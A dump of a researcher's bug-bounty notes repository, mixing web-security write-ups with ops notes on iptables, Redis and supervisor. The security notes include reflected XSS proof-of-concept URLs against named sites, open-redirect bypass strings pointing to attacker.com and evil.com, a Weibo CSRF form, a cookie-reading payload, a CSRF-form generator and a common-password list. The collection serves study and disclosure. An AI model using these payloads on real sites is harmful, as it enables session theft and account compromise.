├── .gitignore ├── tools ├── requirements.txt ├── crxmake.py ├── top_100_pass.txt ├── generate_csrf_form.py ├── hunt.py ├── xss_via_redirect.py └── zf.py ├── images └── 20150916232022.png ├── 2016-11-05-软链接引起的事故.md ├── 2017-03-22.md ├── 2017-03-30.md ├── 2015-09-16-XSS.md ├── 2016-11-10-配置Mongodb集群的问题.md ├── 2016-09-15-外部服务被劫持导致信息泄露.md ├── 2017-03-23.md ├── 2017-04-01.md ├── 2016-08-05-利用XSSAuditor阻止网站加载指定的JS文件.md ├── 2017-03-24.md ├── 2016-11-18-supervisor常用操作.md ├── 2016-11-05-RedisSentinel配置失误.md ├── 2017-04-16.md ├── 2016-09-07-Weird-Behavior-of-IE.md ├── addthis_poc └── poc.html ├── 2015-09-12-XSS_Reflected.md ├── README.md ├── 2016-05-16-Bypass-URL-Check.md ├── 2016-07-18-JS语法错误vs语义错误.md ├── 2015-11-18-WeiboCSRF.md ├── 2016-06-27-location.hash绕过长度限制.md ├── 2016-05-17-Bypass-Chrome-XSS-Auditor.md ├── 2015-09-05-XSS_encodeURI.html ├── 2016-06-07-document.domain的妙用.md ├── 2016-03-16-XSS.md ├── 2016-08-13-HPP-and-URL-Bypass.md ├── 2016-11-15-iptables相关配置.md ├── 2015-11-08-MyWay.md ├── 2017-08-27-找出是谁登录了你的Gitlab服务器.md ├── 2016-10-13-Flask-MongoEngine连接问题的思考.md └── 2015-11-07-SQLMap.md /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | -------------------------------------------------------------------------------- /tools/requirements.txt: -------------------------------------------------------------------------------- 1 | futures 2 | multicpu 3 | -------------------------------------------------------------------------------- /images/20150916232022.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhchbin/xxxx/HEAD/images/20150916232022.png -------------------------------------------------------------------------------- /2016-11-05-软链接引起的事故.md: -------------------------------------------------------------------------------- 1 | From: https://hackerone.com/reports/178152 2 | 3 | 处理用户上传的文件的时候,压缩包中包含有软链接,使用JSON读取的时候没有过滤掉,并将出错的结果暴露给了前端,导致服务器文件泄露。 4 | -------------------------------------------------------------------------------- /2017-03-22.md: -------------------------------------------------------------------------------- 1 | [Stealing Messenger.com Login Nonces](https://stephensclafani.com/2017/03/21/stealing-messenger-com-login-nonces/) 2 | 3 | 里面提到了一个工具:https://crt.sh/?q=%25.uber.com 好用啊!! 4 | -------------------------------------------------------------------------------- /2017-03-30.md: -------------------------------------------------------------------------------- 1 | > From https://twitter.com/zseano/status/847295384430956544 2 | 3 | I've been having a lot of success lately bypassing open url redirect filters with this: `hxxps://lol.com\.theirsite.com/test (replace hxxps)` 4 | -------------------------------------------------------------------------------- /2015-09-16-XSS.md: -------------------------------------------------------------------------------- 1 | ## 搜索楼盘接口存在XSS问题 2 | 3 | POC 4 | 5 | ```html 6 | http://sz.xxxx.com/loupan/rs%22%3E%3Cscript%3Ealert%281%29%3C/script%3E 7 | ``` 8 | 9 | 原因:反射型XSS,输出到HTML页面了,同时要保存到cookie里,造成重复触发。 10 | 11 | ![](/images/20150916232022.png) 12 | -------------------------------------------------------------------------------- /2016-11-10-配置Mongodb集群的问题.md: -------------------------------------------------------------------------------- 1 | * `ulimit` 不是一个可执行程序,而是一个内置shell script函数,导致在脚本文件中使用`dash`解析执行的时候会出现以下错误,使用`#!/bin/bash`解析执行可解决问题。 2 | 3 | ```bash 4 | ulimit: Illegal option -u 5 | ``` 6 | 7 | 参考:https://github.com/edelight/chef-mongodb/issues/146 8 | -------------------------------------------------------------------------------- /2016-09-15-外部服务被劫持导致信息泄露.md: -------------------------------------------------------------------------------- 1 | From: http://blog.pentestnepal.tech/post/149985438982/reading-ubers-internal-emails-uber-bug-bounty 2 | 3 | ## 思路分析 4 | 5 | * 重点:添加`inbound parse webhook`,SendGrid没有强制验证邮件接受者的域名就是用户所持有。 6 | * 过程: 7 | 1. 添加一个Webhook url 8 | 2. 任何发送到被指定域名的邮件都会被Webhook url所接收 9 | -------------------------------------------------------------------------------- /2017-03-23.md: -------------------------------------------------------------------------------- 1 | ## 查看端口所属进程 2 | > From http://weibo.com/1273725432/EB6yM6csO?type=comment 3 | 4 | 查看端口所属进程,过去用过lsof、netstat、fuser、pfiles,甚至还有mdb。最近看XorDDoS Trojan时,才知道有新的"ss -napt"可用。样本在对付ss,忍不住好奇看了一遍ss(8)。 5 | 6 | ## tcpdump获取数据包 7 | 8 | ```sh 9 | sudo tcpdump host 172.16.0.1 -i eth1 -w mycap.pcap 10 | ``` 11 | -------------------------------------------------------------------------------- /2017-04-01.md: -------------------------------------------------------------------------------- 1 | ## Posting JSON with an HTML Form 2 | ```html 3 | 4 |
5 | 6 |
7 | 8 | ``` 9 | 10 | This results in a request body of: 11 | 12 | ```json 13 | {"secret": 1337, "trash": "="} 14 | ``` 15 | -------------------------------------------------------------------------------- /2016-08-05-利用XSSAuditor阻止网站加载指定的JS文件.md: -------------------------------------------------------------------------------- 1 | 当`X-XSS-Protection: 1`的时候,我们可以通过在请求参数中填入一些会在网页中出现的代码,使得过滤器以为这是个XSS攻击,然后阻止该文件的执行,导致指定的网页不加载特定的JS文件,例如: 2 | 3 | http://www.qq.com/?%3Cscript%20type=%22text/javascript%22%20src=%22http://mat1.gtimg.com/www/asset/lib/jquery/jquery/jquery-1.11.1.min.js%22%3E%3C/script%3E 4 | 5 | ![](http://ww3.sinaimg.cn/large/7184df6bgw1f6iw4i8mvaj20yy0lhgxo.jpg) 6 | -------------------------------------------------------------------------------- /2017-03-24.md: -------------------------------------------------------------------------------- 1 | > From https://hackerone.com/reports/174474 2 | 3 | 能够从url hash里设置cookie也是神奇。。 4 | ``` 5 | https://testerovusera.harvestapp.com/people/1412277/edit#NewGlobalCookieKey=NewGlobalCookieValue;path=/;/ 6 | ``` 7 | 8 | ![](http://ws1.sinaimg.cn/large/7184df6bgy1fdydwv4u7kj216h02q3yp.jpg) 9 | 10 | > From http://agrrrdog.blogspot.ru/2017/03/autobinding-vulns-and-spring-mvc.html 11 | 12 | 学习到了一种新的漏洞类型:`Autobinding` or `Mass Assignment` 13 | -------------------------------------------------------------------------------- /2016-11-18-supervisor常用操作.md: -------------------------------------------------------------------------------- 1 | ## Supervisor日常使用 2 | 3 | 1. 添加了配置文件,如何更新? 4 | 5 | ```bash 6 | $ sudo supervisorctl reread 7 | $ sudo supervisorctl update 8 | ``` 9 | 10 | 2. 重启某个服务 11 | 12 | ```bash 13 | $ sudo supervisorctl restart xxxx 14 | ``` 15 | 16 | 3. 重启所有程序 17 | 18 | ```bash 19 | $ sudo supervisorctl reload 20 | ``` 21 | 22 | 4. 一个配置运行多个进程 23 | 24 | ``` 25 | process_name = %(program_name)s_%(process_num)02d 26 | numprocs = 2 27 | ``` 28 | -------------------------------------------------------------------------------- /2016-11-05-RedisSentinel配置失误.md: -------------------------------------------------------------------------------- 1 | 在配置Redis Sentinel的时候,出现了一个现象:同时启动程序和redis-sentinel,能够正常连接, 2 | 但过了30秒后再启动程序连接redis-sentinel,就会报:`MasterNotFound/SlaveNotFound`的错误, 3 | 同时日志中出现以下的错误: 4 | 5 | ```bash 6 | [16036] 02 Nov 16:24:14.048 # Sentinel runid is 5e67e92ea843190baa6b2acea31ead4796fe2e92 7 | [16036] 02 Nov 16:33:17.585 # +sdown master mymaster 127.0.0.1 6379 8 | ``` 9 | 10 | 原因:redis-sentinel会定期Ping Redis服务器,但由于我很久之前配置的时候傻逼了,在redis上配置了 11 | 密码,但忘记配置redis-sentinel访问redis的密码。但由于配置时间过去太久,找问题的时候就没想到是这个, 12 | 浪费了些时间。 13 | -------------------------------------------------------------------------------- /2017-04-16.md: -------------------------------------------------------------------------------- 1 | > From https://hackerone.com/reports/88719 2 | 3 | It is dangerous to use jQuery's ajax function without specifying the expected data type. Attacker can supply a remote js file to achieve XSS. This can be addressed by specifying the data type to be JSON 4 | 5 | ``` 6 | $.get('https://innerht.ml/vectors/js.php') 7 | ``` 8 | 9 | https://innerht.ml/vectors/js.php 10 | ``` 11 | access-control-allow-credentials:true 12 | access-control-allow-origin:https://jquery.com 13 | 14 | alert(document.domain); 15 | ``` 16 | -------------------------------------------------------------------------------- /2016-09-07-Weird-Behavior-of-IE.md: -------------------------------------------------------------------------------- 1 | ```bash 2 | $ curl -i "https://httpbin.org/redirect-to?url=http://%2577%2577%2577%252E%256D%2569%2563%2572%256F%2573%256F%2566%2574%252E%2563%256F%256D/test" 3 | 4 | HTTP/1.1 302 FOUND 5 | Location: http://%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D/test 6 | ``` 7 | 8 | * Redirected URL for Internet Explorer: http://www.microsoft.com9crosoft.com/test 9 | * Redirected URL for other browsers: http://www.microsoft.com/test 10 | 11 | From: http://blog.innerht.ml/internet-explorer-has-a-url-problem/ 12 | -------------------------------------------------------------------------------- /addthis_poc/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |
Click anywhere :)

4 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /2015-09-12-XSS_Reflected.md: -------------------------------------------------------------------------------- 1 | ## 反射型漏洞 2 | 3 | 直接把URL的输出在iframe的src中,对,没有过滤。这个问题我都不想记了。 4 | 5 | ``` 6 | URL:http://www.xxxxx.net/yun/index.php?m=Index&c=Content&a=index&cid=21&aid=3 7 | ``` 8 | 9 | 页面HTML中出现了: 10 | 11 | ```html 12 | 14 | ``` 15 | 16 | Payload: 17 | 18 | ``` 19 | URL: http://www.xxxxx.net/yun/index.php?m=Index&c=Content&a=index&mid=1&cid=21aaa&aid=3%22%20onmouseover=%22alert%281%29 20 | ``` 21 | 22 | 这个会被`Chrome`的xss过滤器拦截,在其他浏览器下可以。 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## XXXX 2 | 3 | 你知道我在干嘛吗? 4 | 5 | ### Tools 6 | * [批量下载crossdomain.xml的脚本](tools/hunt.py) 7 | * [从Burp Suite生成的请求文件生成CSRF表单](tools/generate_csrf_form.py) 8 | * [Google搜索找URL跳转XSS](tools/xss_via_redirect.py) 9 | 10 | ```bash 11 | $ python xss_via_redirect.py edu.cn 12 | [INFO] Searching links 13 | [INFO] Finding XSS ... 14 | [Potential XSS vulnerability] http://xxxx.xxx.edu.cn/go.asp?url=java%5Cu0073cript%5Cu003a%5Cu0061lert%281%29%3B 15 | ``` 16 | 17 | ### Leagal Disclaimer 18 | 19 | Usage of my scripts for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. 20 | -------------------------------------------------------------------------------- /2016-05-16-Bypass-URL-Check.md: -------------------------------------------------------------------------------- 1 | ## URL检查不严格被绕过的几种情况 2 | 3 | 1. 只检查了URL中是否有合法的域名地址,绕过方式很简单,直接用:`http://evil.com/?http://victim.com`即可。 4 | 2. 前缀校验不严格,前缀应该以`/`结尾的,但没有,绕过:`http://victim.com@evil.com/`或者`http://victim.com.evil.com` 5 | 3. 使用`?`绕过检查,在 http://wooyun.org/bugs/wooyun-2016-0178241 中学到的,`http://evil.com?.victim.com`会被浏览器识别为`http://evil.com/?.victim.com` 6 | 4. From: http://www.slideshare.net/fransrosen/the-secret-life-of-a-bug-bounty-hunter-frans-rosn-security-fest-2016 7 | * https://www.victim.com/account/logout?redirect_url=https://example.com\@www.victim.com 8 | * https://www.linkedin.com/uas/login?session_redirect=https://example.com%252f@www.linkedin.com%2Fsettings 9 | * https://vimeo.com/log_in?redirect=/%09/example.com 10 | * https://test6473.zendesk.com/access/login?return_to=//example.com:%252525252f@test6473.zendesk.com/x 11 | * https://trello.com/login?returnUrl=/\example.com 12 | -------------------------------------------------------------------------------- /2016-07-18-JS语法错误vs语义错误.md: -------------------------------------------------------------------------------- 1 | ```html 2 | 11 | 12 | 13 | ``` 14 | 15 | 上面的代码是正确的JS代码,打开这个页面能够正常地弹出窗口,只是运行时会出错 16 | ```js 17 | Uncaught ReferenceError: indexOf is not defined 18 | ``` 19 | 而如果把`targetPage^indexOf(":") != -1`修改成`targetPage#indexOf(":") != -1`则会报 20 | ```js 21 | test.html:3 Uncaught SyntaxError: Invalid or unexpected token 22 | test.html:11 Uncaught TypeError: top.loadFrames is not a function 23 | ``` 24 | 25 | `a^b` vs `a#b` 26 | > A crucial difference from # and ^, the # is not the operator in JavaScript, but the ^ is the operator. For example, if the a.b; is in the page and it is replaced with # and ^, a#b; is the syntax error but a^b; is valid syntax. 27 | 28 | From: http://mksben.l0.cm/2016/07/xxn-caret.html 29 | -------------------------------------------------------------------------------- /2015-11-18-WeiboCSRF.md: -------------------------------------------------------------------------------- 1 | ## CSRF漏洞之你点我链接就会发一条微博 2 | 3 | 注:非本人发现,看到微博上一位大大在玩。 4 | 5 | 防范CSRF漏洞有两种方式,一种是生成表单的时候插入Token,提交的时候后端验证Token是否合法,另外一种就是验证请求的`Referer`是否来自自己的域名。微博电影上的分享内容到微博的接口采用的后面的方式,在服务端验证。然而,验证好像写错了,正确的姿势应该是验证域名的后缀吧,但微博的后台开发验证是:只要域名里有`weibo.com`就认为是合法的请求。 6 | 7 | ### POC 8 | 9 | * test.html 10 | 11 | ```html 12 |
13 |
15 | 16 | 17 | 18 | 19 |
20 |
21 | 24 | ``` 25 | 26 | * 找个域名,设置一个子域,如:`weibo.com.xxx.com` 27 | 28 | * 在已经登录了微博的浏览器里访问:http://weibo.com.xxx.com/test.html 。 29 | * 也可以设置本地hosts,`127.0.0.1 weibo.com.xxx.com`,然后启动一个HTTP服务器,如:`python -m SimpleHTTPServer 80` 30 | -------------------------------------------------------------------------------- /2016-06-27-location.hash绕过长度限制.md: -------------------------------------------------------------------------------- 1 | ```bash 2 | $ curl -v "http://****.edu.cn/go.asp?url=javascript\u003aeval(location.hash.slice(1))#alert(document.cookie);" 3 | * Trying 127.0.0.1... 4 | * Connected to 127.0.0.1 (127.0.0.1) port 1080 (#0) 5 | > GET http://****.edu.cn/go.asp?url=javascript\u003aeval(location.hash.slice(1)) HTTP/1.1 6 | > User-Agent: curl/7.41.0 7 | > Host: ****.edu.cn 8 | > Accept: */* 9 | > Proxy-Connection: Keep-Alive 10 | > 11 | < HTTP/1.1 200 OK 12 | < Connection: close 13 | < Date: Mon, 27 Jun 2016 06:13:31 GMT 14 | < Server: Microsoft-IIS/6.0 15 | < X-Powered-By: ASP.NET 16 | < Content-Length: 113 17 | < Content-Type: text/html 18 | < Set-Cookie: ASPSESSIONIDCCTTQQQQ=KLNDIOEAOHCIMEMFJMOOMCHN; path=/ 19 | < Cache-control: private 20 | < Proxy-Connection: keep-alive 21 | < 22 | 23 | * Closing connection 0 26 | ``` 27 | 28 | 限制信息:url字符串长度不能超过100,而且会检查一些关键字,比如`url=javascript:alert(1);`会被拦截,但可以用JS编码绕过。 29 | -------------------------------------------------------------------------------- /2016-05-17-Bypass-Chrome-XSS-Auditor.md: -------------------------------------------------------------------------------- 1 | FROM: https://html5sec.org/xssauditor/bypasses-052016?xss=%3Clink%20rel=import%20href=https:html5sec.org/ 2 | 3 | ## XSS Auditor Bypasses 05.2016 4 | The bypasses are different for HTTP and HTTPS pages. Here, you can try both variants. 5 | 6 | ### HTTP Pages 7 | 8 | (visit this page via HTTP) 9 | > ?xss= ?xss=Error 404 25 | ``` 26 | 27 | ### Chrome Version 28 | Google Chrome 49.0.2623.75 (Official Build) m (32-bit) 29 | -------------------------------------------------------------------------------- /2015-09-05-XSS_encodeURI.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
5 | 6 | 7 | 8 | 33 | 34 | -------------------------------------------------------------------------------- /tools/crxmake.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Cribbed from http://github.com/Constellation/crxmake/blob/master/lib/crxmake.rb 3 | # and http://src.chromium.org/viewvc/chrome/trunk/src/chrome/tools/extensions/chromium_extension.py?revision=14872&content-type=text/plain&pathrev=14872 4 | 5 | import sys 6 | from array import * 7 | from subprocess import * 8 | 9 | arg0,input,key,output = sys.argv 10 | 11 | # Sign the zip file with the private key in PEM format 12 | signature = Popen(["openssl", "sha1", "-sign", key, input], stdout=PIPE).stdout.read(); 13 | 14 | # Convert the PEM key to DER (and extract the public form) for inclusion in the CRX header 15 | derkey = Popen(["openssl", "rsa", "-pubout", "-inform", "PEM", "-outform", "DER", "-in", key], stdout=PIPE).stdout.read(); 16 | 17 | out=open(output, "wb"); 18 | out.write("Cr24") # Extension file magic number 19 | header = array("l"); 20 | header.append(2); # Version 2 21 | header.append(len(derkey)); 22 | header.append(len(signature)); 23 | header.tofile(out); 24 | out.write(derkey) 25 | out.write(signature) 26 | zip_data = open(input, 'rb').read() 27 | out.write(zip_data) 28 | out.close() 29 | 30 | print "Done." 31 | -------------------------------------------------------------------------------- /2016-06-07-document.domain的妙用.md: -------------------------------------------------------------------------------- 1 | ## document.domain的妙用 2 | 3 | 在[QQ浏览器9本地文件读取&远程命令执行](http://wooyun.org/bugs/wooyun-2010-0176314)里用到了一个关于`documnet.domain`的小技巧。 4 | 5 | 页面 http://event.browser.qq.com/stdl/miyue/index.html 里前端存在代码 [header.js](http://stdl.qq.com/stdl/tq_center/activity/common/header.js) 设置了其domain为`qq.com`。这意味着,如果`qq.com`的任意一个子域名通过iframe加载上述的页面,只要也设置了相同的domain,就能够访问到event.brrowser上的window对象。 6 | 7 | ```javascript 8 | try { 9 | document.domain = 'qq.com'; 10 | } catch(e) { 11 | } 12 | ``` 13 | 14 | ### 例子 15 | 16 | 案例中用的是XSS,本地测试可以修改一下`hosts`文件,加一个qq的子域名,比如`127.0.0.1 test.qq.com`,然后用QQ浏览器访问下面这个页面,就可以看到QQ浏览器被安装了指定的扩展。 17 | 18 | http://test.qq.com/index.html 19 | 20 | ```html 21 | 22 | 23 | 24 | 39 | 40 | ``` 41 | -------------------------------------------------------------------------------- /2016-03-16-XSS.md: -------------------------------------------------------------------------------- 1 | ## 又一次失败的测试过程 2 | 3 | URL: http://www.acfun.tv/info/status#msgTitle=false;msgContent=4;show=false;email=asdf 4 | 5 | 分析过程 6 | 7 | ```js 8 | ... 9 | var t, e, n, h, a; 10 | switch (h = $.hash("msgTitle"), 11 | n = $.hash("msgContent"), 12 | a = $.hash("show"), 13 | e = $.hash("email"), 14 | t = "", 15 | n) { 16 | case "1": 17 | t = "本链接已经被使用,请重新验证"; 18 | break; 19 | case "2": 20 | t = "出现明目外错误请联系客服"; 21 | break; 22 | case "3": 23 | t = "本链接已过期,请重新修改"; 24 | break; 25 | case "4": 26 | t = "您的邮箱为:" + e 27 | } 28 | return $(".content").html(t), 29 | ... 30 | ``` 31 | 32 | 1. 当`n`为4的时候,会将`t`的值输出到`.content`中。咦,那不是可以XSS? 33 | 2. 直接传入``,发现`<(/`等都被过滤 34 | 3. 发现`\`并没有被过滤,JS十进制或者八进制编码能不能?```\x3cscript\x3ealert`1`\x3c/script\x3e``` 35 | 4. 无果,具体现象如下: 36 | 37 | ```html 38 | 39 |
40 | 41 | 46 | // FAILED http://localhost/#\x3cscript\x3ealert(1)\x3c/script\x3e 47 | var hash = window.location.hash.substring(1); 48 | $('.xss').html(hash); 49 | 50 | ``` 51 | 52 | 注意:输出点是在JS文件中,还是JS去读取存入变量。前者会自动将十进制或者八进制的编码的字符串解码,而后者不会。至此,本次测试宣布以失败告终。 53 | -------------------------------------------------------------------------------- /tools/top_100_pass.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | a123456 3 | 123456a 4 | 5201314 5 | 111111 6 | woaini1314 7 | qq123456 8 | 123123 9 | 000000 10 | 1qaz2wsx 11 | 1q2w3e4r 12 | qwe123 13 | 7758521 14 | 123qwe 15 | a123123 16 | 123456aa 17 | woaini520 18 | woaini 19 | 100200 20 | 1314520 21 | woaini123 22 | 123321 23 | q123456 24 | 123456789 25 | 123456789a 26 | 5211314 27 | asd123 28 | a123456789 29 | z123456 30 | asd123456 31 | a5201314 32 | aa123456 33 | zhang123 34 | aptx4869 35 | 123123a 36 | 1q2w3e4r5t 37 | 1qazxsw2 38 | 5201314a 39 | 1q2w3e 40 | aini1314 41 | 31415926 42 | q1w2e3r4 43 | 123456qq 44 | woaini521 45 | 1234qwer 46 | a111111 47 | 520520 48 | iloveyou 49 | abc123 50 | 110110 51 | 111111a 52 | 123456abc 53 | w123456 54 | 7758258 55 | 123qweasd 56 | 159753 57 | qwer1234 58 | a000000 59 | qq123123 60 | zxc123 61 | 123654 62 | abc123456 63 | 123456q 64 | qq5201314 65 | 12345678 66 | 000000a 67 | 456852 68 | as123456 69 | 1314521 70 | 112233 71 | 521521 72 | qazwsx123 73 | zxc123456 74 | abcd1234 75 | asdasd 76 | 666666 77 | love1314 78 | QAZ123 79 | aaa123 80 | q1w2e3 81 | aaaaaa 82 | a123321 83 | 123000 84 | 11111111 85 | 12qwaszx 86 | 5845201314 87 | s123456 88 | nihao123 89 | caonima123 90 | zxcvbnm123 91 | wang123 92 | 159357 93 | 1A2B3C4D 94 | asdasd123 95 | 584520 96 | 753951 97 | 147258 98 | 1123581321 99 | 110120 100 | qq1314520 101 | -------------------------------------------------------------------------------- /2016-08-13-HPP-and-URL-Bypass.md: -------------------------------------------------------------------------------- 1 | ## HTTP Parameter Pollution 2 | 3 | From https://hackerone.com/reports/114169 4 | 5 | For example: 6 | 7 | > https://www.digits.com/login?consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3A%2F%2Fwww.periscope.tv&host=https%3A%2F%2Fattacker.com 8 | 9 | The first host (host=https://www.periscope.tv) is validated but not the second one. After authentication the second host (host=https://attacker.com) is used as the transfer origin. 10 | 11 | ## URL Bypass 12 | From https://hackerone.com/reports/108113 13 | 14 | However, it is discovered that when outputting a non-ASCII character in the header, it will get converted to a question mark (?). This happens after the validation. Thus, attacker can bypass the validation by putting his/her own domain followed by a non-ASCII character in the authority part. 15 | 16 | Here's how it works: 17 | 18 | Input: 19 | 20 | ``` 21 | https://attacker.com%ff@www.periscope.tv 22 | --------\ authority /\ hostname / 23 | ``` 24 | The URL is parsed and passes the validation because the hostname matches the registered domain. 25 | 26 | Output: 27 | ``` 28 | https://attacker.com?@www.periscope.tv 29 | --------\ hostname /-\ query / 30 | ``` 31 | Since the URL is outputted in the location header, `%ff` which is non-ASCII is converted. Now suddenly the hostname becomes attacker.com and everything after the question mark becomes the query part. Finally the victim will be redirected to attacker's site with victim's account's OAuth credential. 32 | -------------------------------------------------------------------------------- /2016-11-15-iptables相关配置.md: -------------------------------------------------------------------------------- 1 | 只允许DNS解析,NTP日期同步,Ping,IP白名单内的访问(入/出) 2 | 3 | ```bash 4 | #!/bin/bash 5 | 6 | set -o nounset 7 | set -o errexit 8 | 9 | echo "clean all rules before" 10 | iptables -F 11 | iptables -X 12 | 13 | echo "setting up default rules" 14 | iptables -P FORWARD ACCEPT 15 | iptables -P INPUT ACCEPT 16 | iptables -P OUTPUT ACCEPT 17 | 18 | declare -a whitelist=( 19 | "192.168.1.1" 20 | "192.168.1.2") 21 | 22 | echo "setting up input chain" 23 | /sbin/iptables -A INPUT -i lo -j ACCEPT # allow local address 24 | /sbin/iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT # allow exist connection 25 | for i in "${whitelist[@]}" 26 | do 27 | /sbin/iptables -A INPUT -s $i -j ACCEPT 28 | done 29 | /sbin/iptables -A INPUT -p udp --sport 53 -j ACCEPT # dns 30 | /sbin/iptables -A INPUT -p udp --sport 123 -j ACCEPT # ntp 31 | /sbin/iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT # ping 32 | /sbin/iptables -P INPUT DROP 33 | 34 | echo "setting up output chain" 35 | /sbin/iptables -A OUTPUT -o lo -j ACCEPT #allow local address 36 | /sbin/iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT # allow exist connection 37 | for i in "${whitelist[@]}" 38 | do 39 | /sbin/iptables -A OUTPUT -d $i -j ACCEPT 40 | done 41 | /sbin/iptables -A OUTPUT -p udp --dport 53 -j ACCEPT # dns 42 | /sbin/iptables -A OUTPUT -p udp --dport 123 -j ACCEPT # ntp 43 | /sbin/iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT # ping 44 | /sbin/iptables -P OUTPUT DROP 45 | 46 | echo 47 | iptables -vnL 48 | ``` 49 | -------------------------------------------------------------------------------- /2015-11-08-MyWay.md: -------------------------------------------------------------------------------- 1 | 前两天一时兴起在知乎回答了一个问题,虽然没什么赞,也算是自我反思记录吧! 2 | 3 | 我来回答一记,最近正在努力成为一个脚本小子中,乌云Rank应该快到可以从路人变成实习白帽子了。 4 | 5 | 我是出于什么目的呢?业余爱好。本科选修Web安全的课程完全是冲着好玩去的,蔡国杨老师安排的课程的确不错。那个时候学到了很多基础知识:XSS,SQL注入,CSRF,Buffer Overflow等,助教师兄还把[google/gruyere](https://google-gruyere.appspot.com/)(谷歌出品的实验)拿来给我们做作业。但我跟你一样,连脚本小子都不如,想找网站的漏洞一样没思路。不过当时我偷偷保存着学校教育系统的越权漏洞(这个名词很装逼),还有一个可以从学号查学生信息的方法,当然,还有一个老师修改课程成绩的漏洞(这个发现之后立马上报给辅导员了,我是好人吧!)。上面提到的这些漏洞只要细心就能找到,而我当时并不觉得是漏洞,只是纯粹好玩。读研期间忙实习,忙着参与开源项目做代码贡献,就没放太多精力在这上面了。而到了最近毕业开始工作了,工作之余要给自己找点乐子(有朋友教我做个有趣的人,别老是跟电脑过不去,可惜我的爱好少得可怜,追追美剧,学学做菜,打打篮球,千万别学我,没救的),加上有两个朋友也开始做渗透测试的工作。所以我又重新燃起了当时玩的激情,却发现一玩不可收拾了。利用业务时间,看完了余弦大大的《Web前端黑客技术揭秘》,看了乌云上心伤的瘦子的XSS教程,开始乌云刷Rank之路。 6 | 7 | 第一个问题无非就是怎么找目标?我目前也没有什么好方法。只能说多留心吧,前段时间买衣服,发现快递到货要装一个APP才能取件,于是我就装了。拿完衣服后,随手测试发现了该厂商存在的任意密码重置问题,在乌云上报了之后还说要给我发礼物。再分享一个故事,之前参加沙龙见到的核心白帽子:专业种田,听他介绍了Burpsuite的用法,怎么用搜索找洞等姿势,不过重点不是这个,重点是他在回深圳时需要去广州南站,然后他在广州南站发现了:广州高铁站手机充电终端沙盒绕过(可留后门控制手机)的漏洞,让我惊叹他真的是走到哪黑到哪。 8 | 9 | 找到目标之后发现自己实力不够?这个需要基础知识加细心吧我觉得,绝大部分的漏洞并没有想象中的难,至少从我在乌云上看过的漏洞来说。SQL注入,名字大家都懂,工具sqlmap大家都可以用,可是用了之后知道内部原理吗?XSS打Cookies,需要懂前端知识吧?上传一句话GetShell,菜刀连接直捣黄龙,你需要知道人家用的什么后台吧,JSP/PHP/ASP/Python等等语言你得懂吧?正面刚人家找不到漏洞,可以找找旁域和C段,没有一点点DNS和IP地址的基础知识怎么能行呢?所以没有基础,即使漏洞摆在眼前也是白搭吧。 10 | 11 | 所以,我觉得我还是要沉住气,不能浮夸,多多补充基础知识。 12 | 13 | * 看前人留下的资料:乌云上的漏洞很多精华的思路,多看,打开自己的眼界。(我目前只是看乌云园区里的讨论,乌云Wiki,乌云公开的漏洞) 14 | * 有条件复现漏洞环境的尽量进行测试,多动手才好玩啊!比如最近公开的漏洞:【乌云峰会】网易闪电邮远程命令执行附思路分析,完全可以找个旧版本的软件玩玩,玩一次的记忆绝对比你光看要强。 15 | 尝试分享,目前自己做的还不够,希望自己能静下心来多写写东西。 16 | 17 | 这是我最近一段时间的经验分享和自己的一点思考,只是发出来供参考。关于找人带入门的问题:我觉得没人带一样可以找到很多东西学,智商不足勤奋补上嘛!要学会搜索!还有,这篇文章不是乌云的广告贴,我只是把在乌云上刷Rank当成激励自己的目标。 18 | 19 | 20 | 知乎链接:http://www.zhihu.com/question/37062603/answer/71139922 21 | -------------------------------------------------------------------------------- /tools/generate_csrf_form.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import sys 5 | import argparse 6 | import base64 7 | from urlparse import parse_qsl 8 | from xml.dom import minidom 9 | 10 | 11 | def decode_form_urlencoded_values(request_body, encoding='utf-8'): 12 | for pair in parse_qsl(request_body, keep_blank_values=True): 13 | yield tuple(i.decode(encoding) for i in pair) 14 | 15 | 16 | def format_input(name, value): 17 | return '' % (name, value) 18 | 19 | 20 | def generate(index, item): 21 | url = item.getElementsByTagName('url')[0].firstChild.wholeText 22 | method = item.getElementsByTagName('method')[0].firstChild.wholeText 23 | if method.lower() != 'post': 24 | print "Only post request supported." 25 | return 26 | 27 | request = item.getElementsByTagName('request')[0] 28 | content = request.firstChild.wholeText 29 | base64_attr = request.attributes['base64'] 30 | if base64_attr is not None and base64_attr.value == 'true': 31 | content = base64.b64decode(content) 32 | _, body = content.split("\r\n\r\n", 1) 33 | 34 | form = '''
35 | %s 36 | 37 |
''' 38 | 39 | inputs = '\n'.join([format_input(name, value) for name, value in 40 | decode_form_urlencoded_values(body)]) 41 | html = form % (url, inputs) 42 | output_file = 'csrf_' + str(index) + '.html' 43 | with open(output_file, 'wb') as f: 44 | f.write(html.encode('utf-8')) 45 | 46 | 47 | def main(argv): 48 | parser = argparse.ArgumentParser() 49 | parser.add_argument('-i', '--input', type=str, required=True, 50 | help='The burp history xml file.') 51 | args = vars(parser.parse_args(argv)) 52 | input_file = args['input'] 53 | xml_doc = minidom.parse(input_file) 54 | item_list = xml_doc.getElementsByTagName('item') 55 | [generate(index, item) for index, item in enumerate(item_list)] 56 | 57 | 58 | if __name__ == '__main__': 59 | main(sys.argv[1:]) 60 | -------------------------------------------------------------------------------- /tools/hunt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import argparse 5 | import requests 6 | import sys 